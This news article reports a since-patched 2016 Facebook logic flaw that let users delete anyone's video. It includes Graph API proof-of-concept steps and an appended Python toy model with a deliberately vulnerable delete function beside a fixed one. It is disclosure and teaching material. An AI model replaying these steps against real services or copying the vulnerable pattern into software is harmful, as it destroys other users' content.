Facebook’s Bug – Hackers Can Delete Any Video From Facebook Comments

By | June 25, 2016

Facebook Critical Flaw

Indian security researcher Pranav Hivarekar reported a critical security flaw in Facebook’s new video-comment feature. By abusing this logic flaw, Hivarekar was able to delete any video of his choice.

He reported the flaw to Facebook, which fixed it immediately.

Facebook recently launched a new feature that allows users to upload a video in a comment.

When a Facebook user uploads a video as a comment, the video is uploaded to his Facebook timeline and given a video ID. The video is then attached to the target post based on that video ID.

After playing around with some Facebook API (Application Programming Interface) requests, Hivarekar found that he was able to delete any video uploaded as a comment on the platform, based on its video ID.

Proof Of Concept

1. Create a comment on a post via the API.

API call (reference: https://developers.facebook.com/docs/graph-api/reference/object/comments/):

POST /<post_id>/comments?message=test

2. Edit the comment and attach a video of your choice via the API.

Video ID: 1739331926310614 (the video to be deleted)

API call (reference: https://developers.facebook.com/docs/graph-api/reference/v2.6/comment):

POST /<comment_id>?attachment_id=1739331926310614

The video is now attached to the comment.

3. Delete the comment and wait 20 seconds (it takes 20 seconds for the video to be deleted from Facebook’s server).

API call (reference: https://developers.facebook.com/docs/graph-api/reference/v2.6/comment):

DELETE /<comment_id>

This will delete the video.

Facebook’s team deployed a temporary fix 23 minutes after confirming the flaw.

A permanent fix was live 10-12 hours after that.

Kudos to Facebook. 🙂

According to Hivarekar, this bug is proof of a flaw in logic rather than one of the routine technical flaws we see daily, such as RCE or SSRF. Facebook forgot to add permission checks to verify that the user deleting a particular comment was both the owner of that comment and the owner of the attached video.
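To make the missing server-side check concrete, here is a toy model of the comment/attachment delete flow with the flawed and the hardened delete side by side. This is an added example, not the article’s or Facebook’s code; Store, attach_video, delete_comment_vulnerable, delete_comment_fixed and the sample IDs are all constructed.

```python
from dataclasses import dataclass, field


@dataclass
class Store:
    """Minimal stand-in for the video and comment tables (constructed data)."""
    video_owner: dict = field(default_factory=dict)  # video_id -> owner
    comments: dict = field(default_factory=dict)     # comment_id -> [owner, attachment_id]


def attach_video(store, comment_id, user, video_id):
    """Edit step: attach a video to a comment. Only the comment owner may edit,
    but, as in the flow described above, nothing checks who owns the video."""
    if store.comments[comment_id][0] != user:
        raise PermissionError("not the comment owner")
    store.comments[comment_id][1] = video_id


def delete_comment_vulnerable(store, comment_id, user):
    """Flawed delete: removes the comment and cascades to the attached video
    without checking that the deleting user owns either one."""
    _owner, video_id = store.comments.pop(comment_id)
    if video_id is not None:
        store.video_owner.pop(video_id, None)


def delete_comment_fixed(store, comment_id, user):
    """Hardened delete: the caller must own the comment, and the attached video
    is removed only if the same caller also owns it; otherwise only the
    reference is dropped and the video stays on its uploader's timeline."""
    owner, video_id = store.comments[comment_id]
    if owner != user:
        raise PermissionError("not the comment owner")
    del store.comments[comment_id]
    if video_id is not None and store.video_owner.get(video_id) == user:
        del store.video_owner[video_id]


def video_survives(delete_fn):
    """Replays the reported scenario: 'uploader' owns the video, 'commenter'
    attaches it to their own comment and then deletes the comment.
    Returns True if the uploader's video still exists afterwards."""
    store = Store(video_owner={"vid_1": "uploader"},
                  comments={"c_1": ["commenter", None]})
    attach_video(store, "c_1", "commenter", "vid_1")
    delete_fn(store, "c_1", "commenter")
    return "vid_1" in store.video_owner


if __name__ == "__main__":
    print("vulnerable keeps video:", video_survives(delete_comment_vulnerable))  # False
    print("fixed keeps video:", video_survives(delete_comment_fixed))            # True
```

Checking video ownership at attach time as well would be a second layer of defence, but the check at delete time is the one the report identifies as missing.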
